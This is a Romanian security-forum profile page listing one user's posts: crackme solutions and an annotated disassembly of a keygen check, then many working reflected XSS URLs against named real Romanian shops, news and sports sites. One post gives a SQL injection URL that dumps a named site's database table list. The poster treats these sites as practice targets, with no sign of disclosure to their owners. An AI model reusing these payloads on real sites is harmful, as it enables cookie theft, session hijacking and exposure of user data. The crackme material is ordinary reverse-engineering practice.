![](https://rstforums.com/forum/uploads/set_resources_17/84c1e40ea0e759e3f1505eb1788ddf3c_pattern.png)
yulyul2004
-
Posts
43 -
Joined
-
Last visited
-
Days Won
1
Posts posted by yulyul2004
-
-
-
Simplu. Cuvantul este: FELICITARI
-
Spatiu e 32 decimal, 20 hexa(0x20, 20h, etc.).
Null char,n-avem cum sa-l scriem in textbox, este 0 decimal, 0 hexa(0x00, 00h, etc).
Mai mult compilatorul de delphi foloseste "null terminated string", deci daca am pune null la jumatatea parolei, parola ar avea doar 3 caracetre si nu ar trece de validarea de 8 caractere.
PS:
CrackMe-ul original se gaseste aici: http://www.mibs-challenges.de/challenge.php?type=5 sub numele "MiB's Challenges - CrackMe #VII"
-
User: Xdo
Pass: omr?tcst
unde "?" este caraterul 0x00 pe care n-am cum sa-l scriu in textbox.
sau gresesc eu ceva???
-
"parola" este: 000D87A86615.
Trebuie pusa "parola" ca adresa de MAC.
Placa de retea care are MAC-ul asta e facuta de Elitegroup Computer System Co. (ECS)
-
eu zic ca e nevoie si de ala, altfel da IndexOutOfRangeException la str3[0x17]
-
Primul crack-me de tipul asta pe care l-am facut. Mi-a luat 15 minute sa-l rezolv.
serial1:1234567890qwerty + 0xC3 + 0x10 + 0x74 (adresa 0x007410C3)
serial2:1234567890qwerty + 0x59 + 0x11 + 0x74 (adresa 0x00741159)
LE:
CarckMe output:
????????????????????????????????????????????????
???? RSTCenter Crackit #04 :: Enjoy
????????????????????????????????????????????????
????
1??? Serial :1234567890qwerty?^Pt
????????????????????????????????????????????????
???? RSTCenter Crackit #04 :: Enjoy
????????????????????????????????????????????????
????
1??? Serial :1234567890qwertyY^Qt
????
????
3??? You did it! Congrats;)
???? Concatenate the words in the serials
???? to get the pass!
????
???????????????????????????????????????????????? -
Codul: cool13377331å=ssaåP
-
Mi-a luat ceva timp ca am facut keygen-ul in C#.
Parola finala este: geronimo
-
User: Gregor
Pass: 1502754
Mai jos am comentat putin codul asm pentru cine vrea sa faca keygen:
.text:00401000 _main proc near
.text:00401000
.text:00401000 var_B0 = dword ptr -0B0h
.text:00401000 Dest = byte ptr -0ACh
.text:00401000 Serial = dword ptr -78h
.text:00401000 UserSerial = dword ptr -40h
.text:00401000 UserNameLength = dword ptr -3Ch
.text:00401000 Source = byte ptr -38h
.text:00401000 var_37 = byte ptr -37h
.text:00401000 var_4 = dword ptr -4
.text:00401000 argc = dword ptr 8
.text:00401000 argv = dword ptr 0Ch
.text:00401000 envp = dword ptr 10h
.text:00401000
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 sub esp, 0B0h
.text:00401009 push offset aKeyme1ByHertz@ ; "************************\n* Keyme 1 by H"...
.text:0040100E call _printf
.text:00401013 add esp, 4
.text:00401016 push offset aPleaseEnterYou ; "\nPlease enter your username: "
.text:0040101B call _printf
.text:00401020 add esp, 4
.text:00401023 lea eax, [ebp+Source]
.text:00401026 push eax
.text:00401027 push offset Format ; "%s"
.text:0040102C call _scanf
.text:00401031 add esp, 8
.text:00401034 lea ecx, [ebp+Source]
.text:00401037 push ecx ; Source
.text:00401038 lea edx, [ebp+Dest]
.text:0040103E push edx ; Dest
.text:0040103F call _strcpy
.text:00401044 add esp, 8
.text:00401047 push offset unk_4070EC
.text:0040104C lea eax, [ebp+Dest] ; Copy the username address in eax
.text:00401052 push eax ; Str
.text:00401053 call _strstr ; Search for 'e' in the username
.text:00401058 add esp, 8
.text:0040105B mov [ebp+var_4], eax
.text:0040105E cmp [ebp+var_4], 0
.text:00401062 jnz loc_401161 ; Go to wrong username message if Username contains 'e'
.text:00401068 lea ecx, [ebp+Dest] ; Copy the username address in ecx
.text:0040106E push ecx ; Str
.text:0040106F call _strlen ; Get username length
.text:00401074 add esp, 4
.text:00401077 mov [ebp+UserNameLength], eax
.text:0040107A cmp [ebp+UserNameLength], 5
.text:0040107E jle loc_40114D ; Jump to wrong username if username.length < 5
.text:00401084 cmp [ebp+UserNameLength], 0Fh
.text:00401088 jge loc_40114D ; Jump to wrong username if username.length > 0x0F
.text:0040108E mov [ebp+Serial], 1
.text:00401095 movsx edx, [ebp+Source] ; edx = first char
.text:00401099 movsx eax, [ebp+var_37] ; eax = second char
.text:0040109D add edx, eax ; edx = first char + second char
.text:0040109F mov ecx, [ebp+UserNameLength] ; Ecx = username length
.text:004010A2 movsx eax, byte ptr [ebp+ecx+UserNameLength+2] ; eax = Second last char
.text:004010A7 mov ecx, [ebp+UserNameLength] ; useless
.text:004010AA movsx ecx, byte ptr [ebp+ecx+UserNameLength+3] ; ecx = last username char
.text:004010AF add eax, ecx ; eax = eax + ecx (last two chars)
.text:004010B1 imul edx, eax ; edx = edx * eax
.text:004010B4 mov eax, [ebp+Serial] ; eax = 1
.text:004010B7 imul eax, edx ; eax = eax * edx = edx
.text:004010BA mov [ebp+Serial], eax
.text:004010BD mov [ebp+var_B0], 2
.text:004010C7 jmp short loc_4010D8
.text:004010C9 ; ---------------------------------------------------------------------------
.text:004010C9
.text:004010C9 loc_4010C9: ; CODE XREF: _main+FDj
.text:004010C9 mov ecx, [ebp+var_B0]
.text:004010CF add ecx, 1
.text:004010D2 mov [ebp+var_B0], ecx
.text:004010D8
.text:004010D8 loc_4010D8: ; CODE XREF: _main+C7j
.text:004010D8 mov edx, [ebp+UserNameLength]
.text:004010DB sub edx, 2 ; without last 2 chars
.text:004010DE cmp [ebp+var_B0], edx
.text:004010E4 jge short loc_4010FF ; check if we reached the end
.text:004010E6 mov eax, [ebp+var_B0]
.text:004010EC movsx ecx, [ebp+eax+Source] ; ecx = current char
.text:004010F1 mov edx, [ebp+Serial] ; edx = serial
.text:004010F4 add edx, ecx ; edx = serial + current char
.text:004010F6 imul edx, [ebp+UserNameLength] ; edx = edx * UserNameLength
.text:004010FA mov [ebp+Serial], edx ; save the serial
.text:004010FD jmp short loc_4010C9
.text:004010FF ; ---------------------------------------------------------------------------
.text:004010FF
.text:004010FF loc_4010FF: ; CODE XREF: _main+E4j
.text:004010FF push offset aPleaseEnterY_0 ; "\nPlease enter your key to verify: "
.text:00401104 call _printf
.text:00401109 add esp, 4
.text:0040110C lea eax, [ebp+UserSerial]
.text:0040110F push eax
.text:00401110 push offset aD ; ; "%d" - read a decimal
.text:00401115 call _scanf
.text:0040111A add esp, 8
.text:0040111D mov ecx, [ebp+UserSerial] ; User serial
.text:00401120 cmp ecx, [ebp+Serial] ; compare with generated serial
.text:00401123 jnz short loc_401139
.text:00401125 push offset aKeyIsCorrect__ ; "\nKey is correct...\n"
.text:0040112A call _printf
.text:0040112F add esp, 4
.text:00401132 call __getch
.text:00401137 jmp short loc_40114B
.text:00401139 ; ---------------------------------------------------------------------------
.text:00401139
.text:00401139 loc_401139: ; CODE XREF: _main+123j
.text:00401139 push offset aSorryYourKeyIs ; "\nSorry, your key is wrong...\n"
.text:0040113E call _printf
.text:00401143 add esp, 4
.text:00401146 call __getch
.text:0040114B
.text:0040114B loc_40114B: ; CODE XREF: _main+137j
.text:0040114B jmp short loc_40115F
.text:0040114D ; ---------------------------------------------------------------------------
.text:0040114D
.text:0040114D loc_40114D: ; CODE XREF: _main+7Ej
.text:0040114D ; _main+88j
.text:0040114D push offset aOnlyUsernamesW ; "\nOnly usernames with length between 5 a"...
.text:00401152 call _printf
.text:00401157 add esp, 4
.text:0040115A call __getch
.text:0040115F
.text:0040115F loc_40115F: ; CODE XREF: _main:loc_40114Bj
.text:0040115F jmp short loc_401173
.text:00401161 ; ---------------------------------------------------------------------------
.text:00401161
.text:00401161 loc_401161: ; CODE XREF: _main+62j
.text:00401161 push offset aSorryThisUsern ; "\nSorry, this username is not supported."...
.text:00401166 call _printf
.text:0040116B add esp, 4
.text:0040116E call __getch
.text:00401173
.text:00401173 loc_401173: ; CODE XREF: _main:loc_40115Fj
.text:00401173 mov esp, ebp
.text:00401175 pop ebp
.text:00401176 retn
.text:00401176 _main endp -
CrackMe output:
Master Yoda: To the Academy I welcome you, young Padwan !
Hmmmm.....
Doubt in your ways your spirit reveals. Your name, do you know ?
Padwan: skywalker. luke skywalker.
Master Yoda: Your name The Force has heard. It's worthy of a bright future!
....still...
Do know your place in The Universe ?
Padwan: i must follow the path of the force.
Master Yoda: Congratulations! You are wise and your spirit strong !
____________________________________________________________________________
"crackme" created by xact
Functia de decodare e facuta in C#
using System;
namespace HttpClient.RST
{
public class CrackMe08 : IMissoin
{
public void Execute()
{
Console.WriteLine(Decode("-sdlkbvzjt fjvk!-sdlkbvzjt"));
Console.WriteLine(Decode("-fbsng fgu gn!gu`q fgu xnmkpe!sttn j"));
}
/// <summary>
/// Decodes the string.
/// </summary>
/// <param name="source">Encoded string.</param>
/// <returns>Decoded string.</returns>
private static string Decode(string source)
{
string result = string.Empty;
for (int i = source.Length - 1; i > -1; i--)
result += source[i] != ' ' ? ((char) (source[i] + ((source.Length - i)%2 == 0 ? 1 : -1))) : ' ';
return result;
}
}
}Din pacate nu cred ca o sa am timp sa fac un CrackMe prea curand, deci... daca pune altcineva nu ma supar.
-
parola e 19880502
probabil e vreo data de nastere !?!?!?.... 02/05/1988
-
Am gasit parola. Ti-am trimis mail.
-
http://www.icr.ro/programe.php?cod=0%20union%20all%20select%201,2,3,4,%27%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E%27,6,7,8,9,0,1,2,3,4,5,6,7,8,91%20from%20dny_users%20limit%200,1--tables:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,cen_actualizari,cen_alte,cen_ban,cen_cartiaparute,cen_categori,cen_categorii_programe,cen_config,cen_contact,cen_curs_valutar,cen_despreicr,cen_desprenoi,cen_evenimente,cen_institutii_partenere,cen_langs,cen_linkuri_utile,cen_mailtrim,cen_noutati,cen_nrevenimente,cen_nrnoutati,cen_online,cen_organizatori,cen_parteneri_media,cen_participare,cen_presa,cen_prezentare,cen_programe,cen_regulament,cen_sendmail,cen_sesiunijurizare,cen_stiri,cen_tari,cen_users,cen_vizite,cen_vizite_pagini,dny_users,ic_adrese_newsletter,ic_adrese_newsletter_filiale,ic_anunturi,ic_anunturi_a,ic_anunturi_newsletter,ic_anunturi_newsletter_filiale,ic_asociatii,ic_biblioteca,ic_burse,ic_categorii_linkuri,ic_chestionare,ic_comunicate,ic_conducere,ic_config,ic_contact,ic_date_newslettere,ic_date_newslettere_f
-
http://www.rompres.ro/news.php?c=&s=&q=psd%22%3E%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E&w=3&t=0&h=0
-
asa cum am promis...
magazine online mai cunoscute
pe title
http://www.altex.ro/search/index.jsp?searchTerms=%3C%2F%74%69%74%6C%65%3E%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%0A
fara title
http://www.altex.ro/search/index.jsp?searchTerms=%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%0A
http://www.domo.ro/cauta?TextCautat=%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E
la onfocus
http://www.pcfun.ro/index.php?page=search&action=products&x=0&y=0&query=asdf+%2F%2F%22+onfocus%3D%27onfocus%3Dalert(document.cookie)%27
onfocus pe search
http://www.pcgarage.ro/cauta/asdf%22+onfocus%3D%22alert(document.cookie)
http://www.price.ro/index.php?section=&action=search&text=%3C%2Ftitle%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E+&x=0&y=0&categ_id=1151&pretDeLa=&pretPanaLa=
http://www.price.ro/index.php?section=&action=search&text=asdf%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E+&x=31&y=12&categ_id=1151&pretDeLa=&pretPanaLa= -
...ca tot sunt meciuri in seara asta.
daca au mai fost postate, imi cer scuze, dar n-am gasit search-ul pe forum deocamdata.
http://www.dinamovisti.ro/arhiva/stiri/?v=%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E&x=18&y=10
http://www.stelisti.ro/arhiva/stiri/?v=%52%61%64%6F%69%20%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E\http:/
http://www.rapidisti.ro/arhiva/stiri/?v=%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E&x=0&y=0
http://www.cfrcluj1907.ro/ro/stiri/arhiva/?v=%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3Eordinea este chiar intamplatoare
-
thanks,
daca am timp si luna viitoare ma reprofilez pe sql injection. (pe .ro evident
)
-
http://all-it.ro/src_rst.php?cautare=%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E
%70%72%6F%63%65%73%6F%72%22%3E%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%49%4D%47
http://www.azerty.ro/search/?x=0&y=0&q=procesor%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E%3CIMG
http://www.ecost.ro/advanced_search_result.php?search_in_description=1&keywords=%3C%2F%74%69%74%6C%65%3E%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%0A&x=16&y=7
http://www.ecost.ro/advanced_search_result.php?search_in_description=1&keywords=%22%3E%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%0Ala tittle
http://www.electrofun.ro/index.php?page=search&action=products&x=0&y=0&query=%3C%2Ftitle%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E+
la afisare search
http://www.electrofun.ro/index.php?page=search&action=products&x=0&y=0&query=%22%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E%3Cimg%20src=http://www.magazinultau.ro/advanced_search_result.php?keywords=%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E
http://www.say-shops.ro/?pg=lista&src=%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E&tip=
revin cu inca un post cu magazine mai cunoscute.
daca poate scoate cineva "l"-ul in plus din titlu as fi recunoscator
-
Thanks,
Ma bucur ca apreciaza cineva.
Urmeaza o lista de magazine IT online romanesti.
offtopic
Am o intrebare: ce trebuie sa realizez sa pun si eu poza la semnatura?
-
http://www.brm.ro/root/index.php?page=cauta&search=%27%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E
-
mersi
deocamdata imi testez "cunostintele" cu .ro-uri si postez doar xss-uri inofensive.
-
e inutil, dar mi-a luat ceva timp sa-l gasesc.
la mouseover pe Link-ul English (dreapta sus)
http://www.mie.ro/cauta.php?c=comert%22%20onmouseover%3D%22alert%28document.cookie%29%22
-
http://www.findjob.ro/search.php?locuri_de_munca=%5C%3E%3C%2Ftitle%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E+&oras=&submit.x=45&submit.y=12
Decrypt
in Challenges (CTF)
Posted
Cate litere fara spatii sunt? Sunt cuvinte cu sens? Au sens impreuna? Tu ai un algoritm de reverse? Sau ai folosit functii de hashing?